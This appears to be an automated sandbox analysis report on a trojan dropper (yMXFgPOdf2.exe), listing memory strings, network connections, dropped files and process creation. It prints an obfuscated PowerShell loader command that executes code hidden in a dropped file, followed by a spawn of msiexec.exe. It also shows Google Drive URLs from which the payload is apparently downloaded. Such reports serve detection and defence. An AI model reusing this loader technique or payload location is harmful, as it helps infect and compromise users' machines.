      Source: msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJQ3=
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJcQO7xT-tc8NDMtUgUWzj
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJgUWzj1OH4dV11wJ
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJiZjHo1mQz0xRESfViuyh
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJlEJ
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJn=
      Source: msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1985745862.00000000088CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1973777861.00000000088CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2455642871.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2467698218.0000000008908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/;
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
      Source: msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2455642871.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2467698218.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2400033827.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2433075862.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2202486954.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2282928980.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293809735.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download00
      Source: msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download5
      Source: msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2202486954.00000000088C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download9s
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download_
      Source: msiexec.exe, 00000007.00000002.2605447393.00000000088B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download_o
      Source: msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2455642871.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2467698218.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2400033827.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2433075862.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2282928980.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293809735.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2329776779.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloada:
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadi
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadw
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloadx
      Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=downloady
      Source: powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1998363215.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2111815111.000000000891F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1998363215.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2111815111.000000000891F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1998363215.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2111815111.000000000891F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com7
      Source: msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com77
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.11:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49992 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50011 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50031 version: TLS 1.2
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040518A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040518A

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeJump to dropped file
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00403229 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403229
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004065470_2_00406547
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00406D1E0_2_00406D1E
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004049C70_2_004049C7
      Source: yMXFgPOdf2.exe, 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe
      Source: yMXFgPOdf2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@6/12@2/2
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00404481 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404481
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Users\user\AppData\Roaming\postarmisticeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile created: C:\Users\user\AppData\Local\Temp\nsaE914.tmpJump to behavior
      Source: yMXFgPOdf2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeVirustotal: Detection: 66%
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile read: C:\Users\user\Desktop\yMXFgPOdf2.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\yMXFgPOdf2.exe "C:\Users\user\Desktop\yMXFgPOdf2.exe"
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeSection loaded: coreuicomponents.dllJump to behavior
